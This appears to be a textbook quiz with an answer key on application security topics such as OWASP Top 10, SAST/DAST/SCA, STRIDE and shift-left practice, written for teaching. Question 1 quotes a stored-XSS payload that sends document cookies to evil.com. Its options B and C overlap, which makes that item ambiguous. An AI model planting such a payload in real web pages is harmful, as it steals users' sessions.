Skip to content

Chapter 30 Quiz: Application Security

Test your knowledge of OWASP Top 10, secure SDLC, testing methodologies, threat modeling, API security, and shift-left security practices.

Questions

1. A web application allows users to submit a product review. The input is stored in the database and displayed to other users without sanitization. An attacker submits <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Which OWASP Top 10 (2021) category does this represent?

  • A) A01: Broken Access Control
  • B) A03: Injection
  • C) A03: Injection (specifically XSS)
  • D) A07: Identification and Authentication Failures
Answer

B — A03: Injection

In OWASP Top 10 2021, Cross-Site Scripting (XSS) was consolidated into A03: Injection (previously it had its own category in 2017). The attack is stored XSS — malicious script is persisted in the database and executed in victims' browsers on page load, stealing session cookies. The fix is output encoding and Content Security Policy (CSP).

2. A security engineer integrates a tool into the CI/CD pipeline that analyzes source code without executing it, looking for SQL injection patterns, hardcoded credentials, and insecure function calls. Which testing methodology does this describe?

  • A) DAST — Dynamic Application Security Testing
  • B) IAST — Interactive Application Security Testing
  • C) SAST — Static Application Security Testing
  • D) SCA — Software Composition Analysis
Answer

C — SAST — Static Application Security Testing

SAST analyzes source code, bytecode, or binary at rest (without execution) to identify security weaknesses. It is ideal for early pipeline integration (shift-left). DAST tests running applications by sending malicious inputs from the outside. IAST instruments the running application to observe behavior from within. SCA identifies vulnerable third-party library dependencies.

3. During threat modeling of a new payment microservice, the team identifies a scenario: "An attacker impersonates the payment service to the order service and intercepts transaction data." Which STRIDE category does this threat fall under?

  • A) Tampering
  • B) Repudiation
  • C) Spoofing
  • D) Information Disclosure
Answer

C — Spoofing

STRIDE categorizes threats as: Spoofing (impersonating another entity), Tampering (modifying data), Repudiation (denying actions), Information Disclosure (exposing data), Denial of Service, Elevation of Privilege. Impersonating a service to intercept communications is Spoofing. The mitigation is mutual TLS (mTLS) authentication between microservices.

4. A WAF is generating 500 false positives per day, blocking legitimate users. The security team is considering disabling the WAF. What is the better approach?

  • A) Disable the WAF — the false positive rate proves it is not working correctly
  • B) Switch to detection-only mode and never re-enable blocking
  • C) Tune the WAF rules by analyzing false positive patterns, creating exceptions for legitimate traffic, and iterating — accepting some false positives as a trade-off for protection
  • D) Replace all WAF rules with a single blanket block of all POST requests
Answer

C — Tune the WAF rules by analyzing false positive patterns, creating exceptions for legitimate traffic, and iterating — accepting some false positives as a trade-off for protection

WAF tuning is an ongoing process. The correct response to high false positives is analysis and rule refinement: identify which rules trigger on legitimate traffic, create path/parameter-specific exceptions, validate the change doesn't introduce bypass gaps, and iterate. Disabling (A) or detection-only mode (B) eliminates protection. WAF effectiveness requires investment in ongoing tuning.

5. Which OWASP API Security Top 10 category describes an API endpoint that exposes more data fields in its response than the calling application actually uses — for example, returning full user objects including hashed passwords when only the display name is needed?

  • A) API1: Broken Object Level Authorization
  • B) API3: Broken Object Property Level Authorization (Excessive Data Exposure)
  • C) API6: Unrestricted Access to Sensitive Business Flows
  • D) API8: Security Misconfiguration
Answer

B — API3: Broken Object Property Level Authorization (Excessive Data Exposure)

OWASP API3 (2023) covers scenarios where APIs return more data than the client requires, relying on the client to filter sensitive fields. This exposes sensitive properties to anyone intercepting the response. The fix is server-side field filtering — return only the fields explicitly required by the consuming application, not full object representations.

6. A development team introduces a new open-source library with a known critical CVE into the codebase. Which AppSec practice is specifically designed to catch this during the build pipeline?

  • A) SAST scanning
  • B) DAST scanning
  • C) Software Composition Analysis (SCA)
  • D) Fuzz testing
Answer

C — Software Composition Analysis (SCA)

SCA tools (e.g., Snyk, OWASP Dependency-Check, Dependabot) scan project dependency manifests (package.json, requirements.txt, pom.xml) against vulnerability databases (NVD, OSV) to identify known CVEs in third-party libraries. SAST analyzes custom code, not dependencies. DAST tests running applications. SCA is the primary defense against Log4Shell-style supply chain vulnerabilities.

7. An organization wants to embed security knowledge within development teams rather than having all security reviews bottlenecked through a central AppSec team. Which program model achieves this?

  • A) Red team operations embedded in the SDLC
  • B) Security Champions program — developers trained in AppSec who serve as security liaisons within each team
  • C) Outsourcing all code review to a third-party security firm
  • D) Mandatory CISO approval for all code commits
Answer

B — Security Champions program — developers trained in AppSec who serve as security liaisons within each team

A Security Champions program identifies security-interested developers within each team and provides them with dedicated AppSec training, access to security tooling, and a community of practice. Champions perform first-line security reviews, advocate for secure design within their teams, and escalate to the central AppSec team for complex issues. This scales security coverage without requiring a security review for every pull request.

8. In the context of the Secure SDLC, at which phase is threat modeling most effective and cost-efficient?

  • A) During penetration testing, after the application is deployed to staging
  • B) During the Design phase, before code is written
  • C) During production deployment, as part of the change management process
  • D) During the maintenance phase, when vulnerabilities are discovered post-release
Answer

B — During the Design phase, before code is written

Threat modeling is most valuable and least costly during the Design phase because: (1) architectural flaws are cheapest to fix on a whiteboard, (2) design changes are free compared to code refactoring, and (3) security requirements identified early can be built in rather than bolted on. IBM's cost-of-a-bug research shows defects found in design cost 10–100× less to fix than those found in production.

9. A DAST tool is configured to test a REST API. Which type of vulnerability is DAST most effective at discovering that SAST typically misses?

  • A) Hardcoded API keys in source code
  • B) Use of deprecated cryptographic functions
  • C) Business logic flaws and runtime authorization failures visible only when the application executes
  • D) Missing input validation annotations in Java classes
Answer

C — Business logic flaws and runtime authorization failures visible only when the application executes

DAST tests the running application by sending crafted requests and observing responses. It can discover: IDOR (can user A access user B's data?), authentication bypass, session management issues, and server-side behavior that only manifests at runtime. SAST cannot evaluate runtime behavior, business logic, or multi-request authorization flows. DAST complements SAST by covering runtime attack surface.

10. An organization is planning to adopt "shift-left security." Which combination of practices best exemplifies shift-left in a modern SDLC?

  • A) Annual penetration testing and quarterly code reviews
  • B) SAST and SCA in CI pipeline, mandatory threat modeling at design, security unit tests, and developer security training
  • C) WAF deployment in front of all production applications
  • D) Bug bounty program rewarding external researchers for finding vulnerabilities post-launch
Answer

B — SAST and SCA in CI pipeline, mandatory threat modeling at design, security unit tests, and developer security training

Shift-left means moving security activities earlier in the development lifecycle — towards the left of the timeline. The core practices are: SAST/SCA in every build (automated, early feedback), threat modeling at design (before code), security-focused unit/integration tests (in developer workflow), and developer training (building security knowledge at the source). Post-launch activities (WAF, bug bounty, pen testing) are necessary but represent shift-right, not shift-left.

Scoring

Score Performance
9–10 Expert — OWASP, secure SDLC, and AppSec testing methodologies fully mastered
7–8 Proficient — Ready to lead application security programs and pipeline integration
5–6 Developing — Review Chapter 30 sections on STRIDE threat modeling, SAST/DAST/SCA differences, and OWASP Top 10
<5 Foundational — Re-read Chapter 30 before proceeding

Return to Chapter 30 | Next: Chapter 31